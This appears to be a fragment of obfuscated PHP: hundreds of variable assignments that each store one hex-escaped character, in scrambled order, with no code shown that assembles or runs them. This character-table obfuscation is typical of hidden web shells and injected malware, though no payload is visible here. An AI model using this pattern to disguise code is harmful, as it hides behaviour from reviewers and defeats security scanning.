$kc501="\x72";
$kc330="\x65";$kc922="\x0a";$kc1136="\x24";
$kc405="\x2c";$kc729="\x63";$kc817="\x29";$kc479="\x6d";$kc199="\x28";
$kc1075="\x3b";$kc1440="\x65";$kc138="\x73";$kc92="\x6f";$kc126="\x73";$kc1208="\x65";$kc995="\x24";
$kc812="\x65";$kc1655="\x22";
$kc1447="\x73";$kc1298="\x72";$kc119="\x6c";$kc907="\x61";$kc61="\x68";
$kc1024="\x20";$kc551="\x40";
$kc775="\x61";$kc446="\x70";$kc1038="\x6d";$kc1276="\x32";$kc13="\x50";$kc115="\x64";
$kc558="\x73";$kc1102="\x20";$kc295="\x69";
$kc972="\x30";$kc150="\x68";$kc1320="\x20";$kc1104="\x69";$kc1071="\x6d";
$kc1528="\x72";$kc691="\x78";
$kc392="\x70";$kc179="\x20";
$kc532="\x73";$kc1469="\x65";$kc1011="\x3b";$kc447="\x20";$kc837="\x22";$kc372="\x74";
$kc557="\x65";$kc1517="\x6e";$kc425="\x69";
$kc345="\x2b";$kc1679="\x3b";$kc431="\x72";$kc1047="\x6d";$kc1417="\x6e";$kc1205="\x09";$kc1478="\x63";
$kc180="\x3d";$kc1004="\x2e";$kc1664="\x20";$kc708="\x20";$kc598="\x3b";$kc1578="\x20";$kc466="\x75";
$kc1120="\x66";
$kc387="\x29";
$kc1452="\x67";$kc1216="\x69";$kc77="\x65";
$kc1703="\x3b";$kc1631="\x70";$kc777="\x64";$kc410="\x0a";$kc185="\x09";$kc1001="\x61";
$kc631="\x24";$kc828="\x6d";$kc89="\x72";$kc1393="\x74";$kc106="\x73";$kc714="\x78";
$kc802="\x63";$kc965="\x29";$kc645="\x3b";$kc1392="\x73";$kc821="\x72";$kc271="\x20";
$kc854="\x66";$kc30="\x67";$kc835="\x3d";$kc152="\x7b";$kc943="\x28";$kc14="\x65";$kc996="\x76";$kc276="\x63";$kc563="\x09";$kc303="\x73";
$kc390="\x09";$kc1272="\x20";$kc953="\x74";
$kc799="\x09";
$kc675="\x22";$kc803="\x61";$kc695="\x22";$kc183="\x3b";$kc945="\x24";$kc1660="\x72";$kc782="\x2b";$kc617="\x09";$kc189="\x40";$kc100="\x20";$kc1611="\x6e";$kc1652="\x69";$kc263="\x61";$kc1404="\x72";$kc4="\x72";$kc1165="\x3b";$kc1574="\x74";$kc57="\x20";
$kc1637="\x72";$kc824="\x67";$kc1362="\x79";
$kc374="\x28";$kc785="\x29";$kc586="\x61";$kc165="\x20";$kc1459="\x20";$kc171="\x3b";$kc813="\x76";$kc798="\x0a";$kc829="\x63";
$kc1275="\x61";$kc1130="\x28";$kc290="\x63";$kc371="\x73";
$kc999="\x5f";$kc1068="\x5f";$kc528="\x74";$kc17="\x20";
$kc1554="\x23";$kc1629="\x6f";$kc33="\x6e";$kc567="\x3d";
$kc1552="\x65";$kc783="\x31";$kc611="\x3d";$kc1078="\x0a";$kc1182="\x6a";$kc1175="\x0a";$kc1224="\x0a";$kc1645="\x67";$kc1341="\x24";
$kc125="\x74";
$kc385="\x20";$kc1187="\x6e";$kc1382="\x2b";$kc929="\x64";
$kc919="\x2e";$kc1195="\x24";$kc763="\x28";$kc1399="\x2e";$kc1518="\x65";
$kc1428="\x2b";$kc234="\x24";$kc1019="\x64";$kc1619="\x28";$kc342="\x3b";$kc638="\x23";$kc774="\x72";$kc627="\x20";$kc1258="\x40";$kc1576="\x61";$kc1515="\x67";$kc60="\x61";$kc470="\x65";
$kc948="\x25";$kc1688="\x3b";$kc1145="\x3b";$kc1348="\x20";
$kc761="\x20";$kc503="\x65";$kc548="\x2c";$kc1548="\x2d";$kc1287="\x09";$kc649="\x24";
$kc1425="\x32";
$kc31="\x20";$kc652="\x20";
$kc1633="\x2d";$kc962="\x29";$kc147="\x6f";$kc1003="\x65";$kc1456="\x0a";$kc702="\x5f";$kc397="\x40";$kc284="\x72";$kc1665="\x4f";$kc1622="\x22";$kc1386="\x20";
$kc1041="\x3b";$kc1058="\x76";$kc1207="\x6e";$kc1606="\x69";$kc148="\x72";$kc1257="\x09";$kc724="\x72";$kc1695="\x6e";
$kc1647="\x6e";
$kc1142="\x20";$kc1278="\x24";$kc1239="\x20";$kc1380="\x20";$kc609="\x65";$kc689="\x30";$kc583="\x3d";$kc369="\x75";$kc0="\x23";$kc1450="\x69";$kc1209="\x78";$kc1028="\x63";$kc1584="\x63";$kc1235="\x20";$kc590="\x73";$kc122="\x6c";$kc808="\x61";
$kc1167="\x2d";$kc1085="\x6e";
$kc307="\x70";$kc1544="\x63";$kc1296="\x62";
$kc662="\x65";$kc1448="\x74";$kc1219="\x3d";
$kc1524="\x6e";$kc1542="\x65";$kc1474="\x69";$kc359="\x40";$kc950="\x28";$kc273="\x68";$kc144="\x74";$kc1669="\x63";
$kc491="\x72";$kc1437="\x0a";$kc773="\x28";$kc53="\x74";$kc867="\x24";$kc188="\x20";$kc553="\x6e";$kc684="\x22";$kc1692="\x24";$kc1108="\x72";$kc1171="\x3b";$kc64="\x72";$kc1095="\x7d";$kc641="\x72";$kc1308="\x67";$kc275="\x20";
$kc1008="\x22";$kc872="\x24";
$kc751="\x2e";$kc1192="\x6e";$kc1483="\x20";$kc883="\x2b";$kc159="\x63";$kc1088="\x6d";$kc1398="\x20";$kc344="\x2b";$kc1161="\x40";$kc1105="\x73";
$kc1375="\x3c";$kc1194="\x28";$kc1445="\x20";$kc793="\x3b";
$kc1693="\x67";$kc1434="\x0a";
$kc259="\x20";$kc1463="\x73";$kc1568="\x78";$kc742="\x09";$kc1363="\x20";$kc249="\x0a";$kc780="\x30";$kc1007="\x2e";$kc1129="\x20";$kc1044="\x0a";$kc1083="\x75";$kc194="\x70";$kc395="\x68";$kc197="\x3d";$kc1344="\x72";$kc1487="\x6e";
$kc232="\x25";$kc1402="\x73";$kc1002="\x6d";$kc222="\x61";
$kc72="\x74";$kc1610="\x24";$kc467="\x66";$kc716="\x73";$kc97="\x41";$kc1674="\x6f";$kc461="\x77";$kc37="\x65";$kc779="\x32";$kc101="\x72";$kc709="\x24";$kc414="\x0a";$kc1609="\x20";$kc1673="\x6c";
$kc44="\x30";$kc366="\x2c";$kc1608="\x74";$kc848="\x65";$kc1250="\x20";
$kc34="\x67";$kc841="\x76";$kc796="\x7d";$kc1281="\x20";$kc1369="\x30";
$kc460="\x20";$kc1166="\x20";$kc69="\x6f";$kc676="\x5c";
$kc1454="\x0a";$kc1334="\x32";$kc1593="\x6f";$kc1526="\x20";$kc1046="\x24";$kc297="\x64";
$kc1571="\x6e";$kc923="\x09";$kc1438="\x09";$kc947="\x20";$kc365="\x74";$kc673="\x66";
$kc1225="\x09";$kc82="\x6f";
$kc1465="\x69";$kc285="\x73";$kc1397="\x67";$kc607="\x6f";$kc94="\x0a";$kc1583="\x6e";$kc362="\x72";$kc623="\x24";$kc477="\x68";$kc1212="\x69";$kc888="\x7b";$kc805="\x63";$kc704="\x61";$kc1387="\x7b";$kc735="\x24";$kc1702="\x6e";$kc1604="\x70";$kc1234="\x2c";$kc705="\x6d";$kc85="\x31";$kc1="\x20";$kc1254="\x3b";
$kc382="\x24";$kc474="\x23";$kc1170="\x69";
$kc320="\x20";$kc96="\x20";$kc895="\x6f";$kc1668="\x6e";$kc1243="\x24";$kc1353="\x3b";$kc514="\x74";
$kc1037="\x61";$kc1059="\x61";$kc1340="\x20";$kc256="\x69";$kc545="\x69";$kc1051="\x65";$kc1512="\x20";$kc838="\x5c";$kc391="\x09";$kc851="\x3b";$kc1101="\x62";$kc697="\x20";$kc378="\x64";$kc411="\x09";
$kc1419="\x28";$kc1461="\x68";$kc1470="\x63";$kc321="\x30";$kc858="\x28";$kc1556="\x69";
$kc310="\x09";$kc554="\x64";
$kc322="\x3b";$kc1389="\x09";
$kc1403="\x70";$kc38="\x20";$kc343="\x20";$kc1054="\x3d";$kc5="\x65";$kc1049="\x6f";$kc806="\x75";$kc921="\x3b";$kc873="\x23";$kc498="\x20";$kc333="\x74";
$kc1127="\x6d";$kc1533="\x20";$kc902="\x22";$kc1686="\x63";$kc1220="\x20";
$kc1587="\x20";$kc421="\x6e";
$kc309="\x0a";$kc908="\x72";$kc881="\x20";$kc1321="\x69";
$kc718="\x24";$kc1366="\x20";$kc589="\x5f";$kc1535="\x69";$kc635="\x3d";$kc987="\x2e";$kc228="\x6d";$kc226="\x74";$kc937="\x6e";$kc1442="\x75";$kc1547="\x65";
$kc98="\x6c";$kc318="\x20";$kc136="\x2e";$kc1138="\x32";
$kc752="\x3d";$kc629="\x3b";$kc2="\x6d";$kc935="\x22";
$kc690="\x32";$kc1330="\x33";$kc728="\x73";$kc1457="\x0a";$kc1530="\x73";$kc445="\x65";$kc1223="\x3b";$kc1021="\x20";$kc177="\x24";$kc1115="\x5f";
$kc1493="\x20";$kc1015="\x24";$kc134="\x65";$kc1090="\x6f";$kc1173="\x20";
$kc710="\x69";$kc348="\x29";
$kc1240="\x3d";$kc1689="\x0a";$kc262="\x20";$kc206="\x64";
$kc628="\x30";$kc989="\x20";$kc755="\x5c";$kc526="\x79";
$kc606="\x63";$kc1472="\x72";
$kc1698="\x61";$kc1124="\x7b";$kc370="\x62";
$kc484="\x77";$kc355="\x75";$kc1082="\x74";
$kc889="\x0a";$kc1201="\x29";$kc270="\x66";$kc605="\x6d";$kc111="\x65";$kc830="\x6f";$kc244="\x69";$kc591="\x74";$kc1159="\x3d";$kc196="\x20";$kc1319="\x3d";$kc10="\x72";
$kc1372="\x24";$kc41="\x29";$kc416="\x09";$kc143="\x65";$kc1300="\x6e";$kc699="\x76";
$kc1651="\x74";$kc966="\x29";$kc732="\x70";$kc1238="\x5d";$kc268="\x20";$kc83="\x6e";$kc236="\x24";$kc1178="\x6d";$kc1076="\x0a";
$kc492="\x65";$kc882="\x2b";
$kc733="\x74";$kc643="\x70";$kc1697="\x72";
$kc11="\x6c";$kc564="\x24";$kc1304="\x74";$kc78="\x72";$kc1328="\x64";$kc885="\x69";$kc1597="\x28";$kc319="\x3d";$kc1390="\x09";$kc890="\x09";
$kc68="\x63";$kc946="\x69";$kc1026="\x5c";$kc868="\x69";$kc23="\x6d";$kc915="\x2e";
$kc720="\x5d";$kc800="\x23";$kc1227="\x40";$kc1179="\x79";
$kc1435="\x09";$kc843="\x72";$kc127="\x20";$kc1084="\x72";$kc928="\x6f";$kc831="\x64";$kc1073="\x3b";$kc469="\x6c";
$kc1531="\x6f";$kc1541="\x68";$kc328="\x20";$kc573="\x24";$kc1067="\x72";$kc668="\x70";$kc776="\x6e";$kc926="\x6d";$kc983="\x6f";$kc280="\x61";$kc464="\x73";$kc513="\x61";
$kc368="\x73";$kc269="\x6f";$kc1635="\x76";$kc920="\x22";$kc1086="\x20";$kc1426="\x30";
$kc688="\x25";$kc1135="\x20";$kc496="\x6c";$kc1358="\x72";$kc149="\x70";$kc1510="\x74";$kc1575="\x69";$kc650="\x69";$kc845="\x6e";$kc717="\x5b";$kc43="\x32";$kc1326="\x61";
$kc1252="\x69";$kc692="\x5c";$kc436="\x61";$kc1521="\x74";$kc537="\x6c";$kc536="\x66";
$kc1479="\x6f";$kc1694="\x65";$kc36="\x6e";$kc1661="\x69";$kc113="\x76";$kc109="\x65";
$kc1553="\x0a";$kc1307="\x6e";$kc1430="\x37";$kc648="\x2b";$kc186="\x6d";$kc620="\x72";$kc462="\x65";$kc1581="\x0a";
$kc1302="\x5f";$kc1190="\x72";
$kc647="\x2b";$kc669="\x72";
$kc261="\x6e";$kc1033="\x61";$kc886="\x29";$kc1429="\x39";$kc931="\x20";$kc1031="\x24";$kc140="\x62";$kc1074="\x22";$kc75="\x65";$kc1193="\x64";$kc1267="\x24";$kc1273="\x40";
$kc20="\x64";$kc974="\x3b";$kc224="\x64";$kc351="\x0a";$kc238="\x65";$kc497="\x64";
$kc571="\x0a";$kc1154="\x79";$kc1538="\x65";$kc1284="\x5d";$kc439="\x61";
$kc580="\x6d";$kc1148="\x66";$kc679="\x73";$kc544="\x72";$kc9="\x61";$kc292="\x20";$kc1098="\x0a";
$kc217="\x0a";$kc1357="\x6f";$kc1218="\x3d";$kc1079="\x09";$kc1632="\x68";$kc19="\x6f";$kc315="\x28";$kc531="\x5f";
$kc229="\x65";$kc375="\x24";$kc1247="\x24";$kc1143="\x40";$kc473="\x09";$kc852="\x0a";$kc354="\x70";$kc892="\x24";$kc1266="\x20";$kc880="\x3b";$kc1684="\x22";$kc1060="\x6c";$kc1672="\x63";$kc1128="\x79";$kc316="\x24";$kc993="\x22";$kc120="\x6c";$kc76="\x6e";$kc1589="\x65";$kc1580="\x29";$kc585="\x72";$kc214="\x28";$kc896="\x64";$kc639="\x73";$kc1557="\x73";
$kc672="\x74";$kc18="\x63";$kc1110="\x79";
$kc352="\x09";
$kc739="\x29";$kc1056="\x22";$kc46="\x39";
$kc862="\x3d";$kc1268="\x6a";$kc274="\x65";$kc1572="\x65";$kc494="\x75";$kc1137="\x61";$kc441="\x2c";$kc859="\x24";
$kc1162="\x24";$kc1550="\x69";$kc1144="\x5f";$kc1638="\x5f";
$kc839="\x24";
$kc879="\x74";$kc877="\x69";$kc630="\x20";$kc1121="\x6c";$kc71="\x73";$kc1489="\x20";
$kc1471="\x75";$kc1477="\x20";$kc678="\x25";$kc1271="\x3d";$kc891="\x09";$kc525="\x5f";$kc539="\x28";
$kc1385="\x29";
$kc1172="\x29";$kc1032="\x76";$kc389="\x0a";$kc1666="\x20";$kc59="\x72";$kc1549="\x73";$kc6="\x2d";$kc1314="\x79";$kc233="\x24";$kc124="\x66";$kc546="\x70";
$kc1569="\x70";$kc701="\x72";$kc1050="\x64";$kc893="\x6d";$kc1222="\x6a";$kc205="\x6e";
$kc55="\x61";$kc1070="\x61";$kc1299="\x61";$kc1206="\x09";
$kc1446="\x24";$kc329="\x6c";$kc1466="\x73";$kc1119="\x66";
$kc1317="\x6c";$kc1202="\x29";$kc323="\x20";$kc1414="\x2c";$kc1324="\x28";$kc327="\x3c";$kc746="\x63";$kc15="\x72";$kc483="\x20";$kc719="\x69";$kc626="\x3d";$kc1561="\x6f";$kc959="\x28";$kc801="\x20";$kc287="\x77";$kc1249="\x2c";
$kc876="\x72";$kc572="\x09";$kc980="\x24";$kc791="\x30";$kc1453="\x3b";$kc114="\x65";$kc237="\x67";$kc1017="\x63";$kc863="\x20";$kc505="\x74";
$kc734="\x5b";$kc874="\x73";$kc1667="\x24";$kc1460="\x74";$kc1539="\x20";$kc1139="\x29";$kc1204="\x0a";$kc128="\x72";$kc112="\x72";$kc790="\x20";$kc182="\x30";$kc1484="\x6d";$kc971="\x20";$kc1480="\x64";$kc437="\x72";$kc973="\x29";
$kc1464="\x20";$kc674="\x28";$kc809="\x74";
$kc192="\x72";
$kc1040="\x27";$kc602="\x79";$kc311="\x66";$kc1644="\x24";$kc1016="\x6d";$kc443="\x6b";$kc277="\x68";$kc766="\x20";$kc340="\x65";$kc428="\x20";
$kc797="\x0a";$kc1066="\x61";$kc449="\x72";$kc706="\x65";
$kc510="\x65";$kc243="\x74";$kc833="\x20";$kc1211="\x20";$kc451="\x63";$kc1355="\x09";$kc1562="\x77";$kc967="\x29";$kc1089="\x63";$kc399="\x6e";$kc338="\x6f";$kc1558="\x20";$kc1354="\x0a";$kc1476="\x65";$kc139="\x75";$kc24="\x6f";$kc1662="\x6e";$kc789="\x3d";
$kc1283="\x69";$kc569="\x30";
$kc951="\x69";
$kc633="\x20";$kc1303="\x73";$kc1590="\x74";
$kc660="\x6f";$kc154="\x09";$kc520="\x69";$kc227="\x69";
$kc741="\x0a";$kc898="\x20";$kc756="\x6e";$kc592="\x72";
$kc1700="\x69";$kc426="\x7a";
$kc637="\x24";$kc3="\x6f";
$kc518="\x09";$kc212="\x3d";$kc767="\x25";$kc1133="\x31";$kc1546="\x64";$kc768="\x20";$kc1602="\x3b";$kc394="\x73";$kc264="\x72";$kc784="\x29";$kc325="\x69";$kc1199="\x20";$kc434="\x74";$kc485="\x65";$kc1221="\x24";$kc1251="\x24";$kc1680="\x0a";$kc493="\x62";$kc665="\x3d";$kc1062="\x5c";$kc361="\x63";$kc1125="\x0a";$kc1514="\x20";$kc1368="\x20";$kc35="\x69";$kc1020="\x65";$kc302="\x20";$kc187="\x79";
$kc666="\x20";$kc1196="\x69";$kc444="\x65";$kc1325="\x72";$kc1288="\x7d";$kc1712="\x63";$kc826="\x09";$kc657="\x24";$kc964="\x31";$kc1405="\x69";$kc538="\x65";$kc1323="\x74";$kc1620="\x4f";$kc204="\x69";$kc1237="\x6a";$kc1570="\x6f";$kc1035="\x5f";$kc1565="\x67";
$kc16="\x6c";
$kc1467="\x20";$kc49="\x65";$kc1356="\x66";$kc1131="\x24";$kc918="\x69";
$kc66="\x23";$kc1176="\x09";$kc977="\x7d";
$kc1618="\x6e";$kc1226="\x09";$kc1511="\x65";$kc1418="\x74";
$kc1713="\x3b";$kc618="\x66";$kc1132="\x61";$kc1617="\x65";$kc506="\x20";$kc1707="\x61";$kc1018="\x6f";$kc1657="\x3b";$kc827="\x24";$kc1006="\x69";$kc93="\x6e";$kc1174="\x7b";$kc584="\x20";$kc1163="\x61";$kc215="\x29";$kc1274="\x24";$kc1091="\x64";
$kc737="\x5d";$kc822="\x69";$kc121="\x20";$kc969="\x3d";$kc388="\x3b";$kc324="\x24";$kc1396="\x6e";$kc326="\x20";$kc283="\x65";$kc712="\x64";$kc1160="\x20";$kc1598="\x24";
$kc1282="\x24";$kc1433="\x3b";$kc515="\x65";$kc1291="\x0a";$kc1522="\x69";$kc1270="\x20";$kc857="\x20";$kc1462="\x69";$kc1261="\x32";$kc1708="\x6c";$kc251="\x09";$kc208="\x78";$kc419="\x72";$kc1241="\x20";$kc137="\x0a";$kc1513="\x34";$kc614="\x22";$kc1134="\x2c";$kc191="\x63";$kc970="\x3d";$kc941="\x66";$kc169="\x66";
$kc404="\x73";$kc1488="\x73";
$kc406="\x20";$kc1678="\x4f";$kc1423="\x64";$kc1592="\x6d";$kc1053="\x2e";$kc1439="\x72";
$kc430="\x63";$kc1080="\x72";
$kc1585="\x20";$kc547="\x74";$kc1327="\x6e";$kc1365="\x69";$kc141="\x20";$kc1329="\x28";$kc1436="\x7d";
$kc105="\x74";$kc1485="\x65";$kc1022="\x2e";$kc102="\x69";$kc954="\x28";$kc1313="\x6d";$kc157="\x20";$kc1444="\x6e";$kc1337="\x09";
$kc377="\x6f";$kc613="\x22";$kc291="\x68";$kc223="\x6e";$kc288="\x68";$kc135="\x64";$kc723="\x6f";$kc1263="\x24";
$kc1370="\x3b";$kc1616="\x70";
$kc1213="\x66";$kc1559="\x67";$kc305="\x72";$kc1198="\x2b";$kc339="\x64";$kc715="\x65";$kc1277="\x5b";$kc820="\x74";$kc1501="\x6e";$kc667="\x73";$kc45="\x30";$kc210="\x73";$kc1623="\x3e";
$kc62="\x6d";
$kc1109="\x5f";$kc331="\x6e";$kc129="\x65";$kc1096="\x0a";$kc842="\x61";$kc252="\x23";$kc1311="\x0a";$kc130="\x76";$kc1506="\x6f";
$kc1621="\x2c";$kc1654="\x6e";
$kc1696="\x65";
$kc982="\x63";$kc26="\x70";$kc955="\x72";$kc1168="\x2d";$kc924="\x09";$kc453="\x20";
$kc1560="\x72";$kc942="\x20";
$kc1371="\x20";$kc1431="\x29";$kc991="\x5c";$kc1443="\x72";$kc736="\x69";$kc108="\x72";$kc711="\x6e";$kc337="\x63";
$kc565="\x69";$kc482="\x6f";$kc663="\x20";$kc754="\x22";$kc1010="\x22";$kc1294="\x73";$kc502="\x72";$kc1376="\x20";$kc534="\x75";$kc659="\x63";$kc1656="\x29";$kc781="\x29";$kc1659="\x70";$kc961="\x30";
$kc952="\x6e";$kc22="\x20";
$kc1029="\x3d";$kc604="\x24";$kc582="\x20";$kc1481="\x65";
$kc825="\x0a";$kc1612="\x63";$kc579="\x61";$kc213="\x20";
$kc680="\x25";$kc158="\x24";
$kc1420="\x72";$kc981="\x6d";$kc978="\x0a";$kc847="\x6d";$kc1642="\x65";$kc1509="\x75";
$kc642="\x69";$kc823="\x6e";$kc200="\x29";$kc819="\x73";
$kc201="\x2c";$kc542="\x73";$kc472="\x0a";
$kc1378="\x6c";$kc574="\x76";$kc1112="\x74";$kc174="\x6d";$kc202="\x20";$kc1122="\x65";
$kc1685="\x6e";
$kc265="\x72";$kc743="\x09";$kc1519="\x72";$kc1411="\x25";$kc1123="\x0a";$kc1106="\x68";$kc1014="\x09";$kc992="\x24";$kc1214="\x20";$kc1627="\x61";$kc312="\x6f";$kc306="\x69";$kc640="\x63";$kc367="\x20";$kc834="\x2e";$kc299="\x74";$kc1305="\x72";$kc1486="\x61";$kc844="\x5f";$kc914="\x22";$kc636="\x20";$kc241="\x72";
$kc869="\x20";
$kc975="\x0a";$kc1147="\x09";
$kc58="\x4b";$kc581="\x65";$kc95="\x23";
$kc1505="\x63";$kc1359="\x20";$kc968="\x20";$kc587="\x6e";$kc1706="\x76";
$kc1152="\x28";$kc1055="\x20";$kc1681="\x24";$kc173="\x09";$kc747="\x6f";
$kc792="\x29";$kc132="\x72";
$kc1346="\x6e";$kc936="\x5c";$kc12="\x20";$kc452="\x6b";$kc963="\x2b";
$kc738="\x29";
$kc727="\x24";$kc52="\x73";
$kc1126="\x09";
$kc1052="\x20";$kc994="\x2e";
$kc317="\x69";$kc440="\x79";$kc294="\x75";$kc984="\x64";$kc1648="\x65";
$kc1683="\x3d";$kc1626="\x74";
$kc696="\x2c";$kc335="\x28";$kc463="\x20";$kc753="\x20";$kc700="\x61";$kc1591="\x61";
$kc1705="\x65";$kc1523="\x6f";
$kc499="\x63";$kc508="\x6f";$kc772="\x74";
$kc247="\x29";$kc621="\x20";$kc870="\x3c";$kc296="\x6c";$kc1236="\x24";$kc904="\x24";$kc1540="\x74";$kc990="\x22";$kc408="\x69";$kc1309="\x0a";
$kc1537="\x63";$kc794="\x0a";$kc282="\x74";
$kc519="\x66";$kc495="\x69";$kc1087="\x24";
$kc671="\x6e";$kc216="\x3b";$kc1064="\x24";$kc894="\x63";$kc454="\x6f";$kc255="\x75";$kc1092="\x65";$kc1555="\x20";$kc1520="\x61";$kc356="\x73";$kc677="\x24";
$kc759="\x69";$kc610="\x20";$kc1094="\x0a";$kc458="\x6f";
$kc1441="\x74";$kc578="\x6e";$kc603="\x20";$kc1628="\x6d";$kc1407="\x74";$kc1113="\x65";
$kc1373="\x69";$kc1164="\x31";$kc219="\x09";$kc402="\x78";$kc1586="\x3d";$kc1063="\x24";$kc1232="\x24";$kc1151="\x20";$kc459="\x77";$kc1500="\x61";
$kc1364="\x24";$kc740="\x3b";
$kc257="\x6c";$kc1290="\x7d";$kc250="\x0a";$kc836="\x20";$kc555="\x65";$kc400="\x64";$kc599="\x0a";
$kc27="\x68";
$kc1077="\x09";$kc486="\x20";$kc527="\x61";$kc1042="\x22";$kc932="\x2e";$kc300="\x68";$kc917="\x24";$kc771="\x6e";$kc198="\x20";$kc1566="\x20";
$kc1491="\x6f";$kc1242="\x40";$kc481="\x73";$kc901="\x20";$kc468="\x66";$kc455="\x6e";
$kc1331="\x29";$kc242="\x61";$kc958="\x64";$kc1709="\x20";$kc1676="\x65";$kc433="\x70";$kc686="\x5c";
$kc500="\x6f";$kc1379="\x3b";$kc561="\x0a";$kc28="\x69";$kc364="\x70";$kc56="\x6e";$kc107="\x20";
$kc1286="\x0a";$kc471="\x64";$kc1345="\x69";$kc1475="\x76";$kc373="\x72";$kc1177="\x09";
$kc1468="\x72";$kc664="\x2e";$kc1710="\x24";$kc260="\x61";
$kc70="\x6e";
$kc600="\x09";$kc1599="\x24";$kc376="\x63";
$kc190="\x73";
$kc682="\x3d";
$kc562="\x0a";$kc1502="\x0a";$kc512="\x6c";$kc575="\x61";$kc172="\x0a";$kc1701="\x6f";$kc938="\x22";$kc810="\x65";
$kc1573="\x6e";
$kc1473="\x73";$kc279="\x72";$kc601="\x6d";$kc1036="\x6e";$kc1318="\x20";$kc651="\x29";$kc1065="\x76";$kc1432="\x29";$kc1048="\x63";
$kc818="\x20";$kc1527="\x6f";$kc1563="\x69";$kc1630="\x72";$kc1395="\x69";$kc1564="\x6e";$kc778="\x28";$kc450="\x61";
$kc1508="\x70";$kc594="\x6e";$kc230="\x28";$kc478="\x65";$kc266="\x61";$kc1422="\x6e";$kc1231="\x5b";$kc940="\x69";$kc145="\x61";$kc488="\x61";$kc725="\x64";
$kc853="\x09";$kc713="\x65";$kc911="\x61";
$kc524="\x72";$kc73="\x20";$kc160="\x6f";$kc457="\x68";$kc698="\x24";$kc1492="\x75";
$kc245="\x6f";$kc54="\x69";$kc1289="\x0a";$kc267="\x79";$kc540="\x5c";
$kc465="\x68";
$kc1482="\x2c";$kc289="\x69";$kc577="\x5f";$kc521="\x73";$kc998="\x72";$kc1388="\x0a";$kc530="\x73";$kc380="\x2c";$kc906="\x76";
$kc976="\x09";$kc568="\x20";$kc516="\x72";$kc1230="\x31";$kc1536="\x6e";$kc156="\x79";$kc1507="\x6d";$kc110="\x73";$kc595="\x67";$kc764="\x24";$kc1641="\x6d";$kc50="\x62";$kc1280="\x2c";
$kc1421="\x61";$kc48="\x53";$kc1671="\x0a";$kc178="\x69";$kc504="\x63";
$kc1158="\x20";$kc1103="\x66";$kc407="\x24";$kc1367="\x3d";$kc770="\x69";$kc487="\x63";$kc693="\x22";$kc1233="\x69";$kc349="\x20";$kc1012="\x0a";$kc142="\x6d";$kc1567="\x65";$kc744="\x24";$kc1186="\x69";$kc597="\x29";$kc1625="\x65";$kc1057="\x65";
$kc1601="\x29";$kc939="\x20";$kc225="\x28";$kc1408="\x66";$kc944="\x28";$kc1045="\x09";
$kc811="\x20";$kc403="\x65";
$kc1023="\x3d";
$kc360="\x73";$kc1114="\x73";$kc913="\x65";$kc933="\x3d";
$kc1413="\x22";$kc341="\x29";$kc1306="\x69";$kc1312="\x09";$kc787="\x20";$kc912="\x6d";
$kc398="\x69";
$kc40="\x43";$kc1711="\x6e";$kc1072="\x65";$kc1295="\x75";
$kc175="\x79";$kc1494="\x6f";$kc1157="\x69";$kc1677="\x20";
$kc1229="\x61";$kc685="\x5c";
$kc622="\x28";$kc522="\x68";$kc1111="\x61";$kc293="\x62";$kc1646="\x65";$kc1350="\x20";
$kc1381="\x2b";$kc176="\x20";$kc298="\x20";$kc1416="\x69";$kc86="\x20";$kc308="\x74";
$kc535="\x66";$kc429="\x73";$kc1351="\x22";$kc1034="\x72";$kc170="\x74";$kc1543="\x20";$kc1607="\x6e";$kc1377="\x24";$kc438="\x72";$kc1191="\x61";$kc807="\x6c";$kc878="\x70";$kc1596="\x68";$kc1005="\x24";$kc1155="\x20";$kc661="\x64";
$kc47="\x20";$kc490="\x20";
$kc456="\x20";$kc624="\x69";$kc164="\x3d";$kc67="\x20";$kc1039="\x65";$kc1595="\x70";
$kc1361="\x6d";$kc427="\x65";$kc1316="\x24";$kc1107="\x65";$kc193="\x69";$kc749="\x65";
$kc832="\x65";
$kc117="\x20";$kc694="\x3b";$kc509="\x64";$kc986="\x20";$kc1639="\x6e";
$kc1516="\x65";
$kc956="\x61";$kc1069="\x6e";$kc1600="\x63";$kc336="\x24";
$kc254="\x62";$kc1643="\x2d";
$kc533="\x68";$kc1534="\x73";$kc448="\x74";$kc1675="\x73";$kc207="\x65";
$kc25="\x72";$kc619="\x6f";$kc80="\x74";$kc576="\x72";$kc517="\x0a";$kc687="\x78";
$kc1264="\x69";$kc1634="\x24";
$kc1449="\x72";$kc1336="\x0a";$kc855="\x6f";$kc1496="\x6c";
$kc1332="\x29";$kc235="\x2a";$kc1415="\x20";$kc748="\x64";$kc1391="\x24";$kc146="\x6d";$kc1451="\x6e";$kc1401="\x20";$kc1203="\x3b";$kc615="\x3b";$kc104="\x68";
$kc1545="\x6f";
$kc209="\x65";
$kc415="\x0a";$kc195="\x74";$kc1498="\x20";$kc523="\x65";$kc346="\x24";
$kc1180="\x20";$kc632="\x69";$kc118="\x61";$kc897="\x65";
$kc658="\x6d";$kc654="\x0a";$kc1582="\x24";$kc476="\x74";
$kc560="\x3b";
$kc683="\x5c";$kc731="\x69";$kc1285="\x3b";$kc1043="\x3b";$kc1424="\x28";
$kc887="\x20";$kc1153="\x6d";$kc163="\x20";$kc1215="\x24";
$kc1400="\x3d";$kc21="\x65";
$kc74="\x67";$kc788="\x3d";$kc655="\x09";$kc1118="\x75";$kc353="\x09";$kc1410="\x22";$kc304="\x63";$kc412="\x7d";$kc1343="\x74";$kc1200="\x31";$kc566="\x20";$kc1339="\x79";$kc1499="\x63";
$kc1117="\x68";$kc358="\x20";$kc552="\x69";$kc423="\x6f";$kc1025="\x22";
$kc65="\x0a";
$kc42="\x20";$kc1197="\x20";$kc795="\x09";$kc1412="\x63";$kc864="\x30";
$kc1691="\x2b";$kc703="\x6e";
$kc653="\x7b";$kc730="\x72";
$kc246="\x6e";$kc63="\x65";$kc1577="\x6c";
$kc1714="\x0a";$kc556="\x78";$kc846="\x61";$kc815="\x6c";$kc850="\x22";$kc1347="\x67";$kc313="\x72";$kc432="\x69";$kc758="\x20";$kc1181="\x24";$kc1260="\x61";$kc681="\x64";$kc1687="\x22";$kc949="\x20";$kc103="\x67";$kc1504="\x20";$kc1061="\x20";
$kc1262="\x5b";
$kc875="\x63";$kc1497="\x79";$kc168="\x69";$kc286="\x20";$kc51="\x61";
$kc1183="\x20";$kc1394="\x72";$kc84="\x2d";$kc1081="\x65";$kc1244="\x61";$kc1265="\x2c";$kc985="\x65";$kc884="\x24";
$kc549="\x20";$kc162="\x65";$kc8="\x65";$kc910="\x6e";$kc865="\x3b";$kc379="\x65";$kc435="\x20";$kc253="\x20";
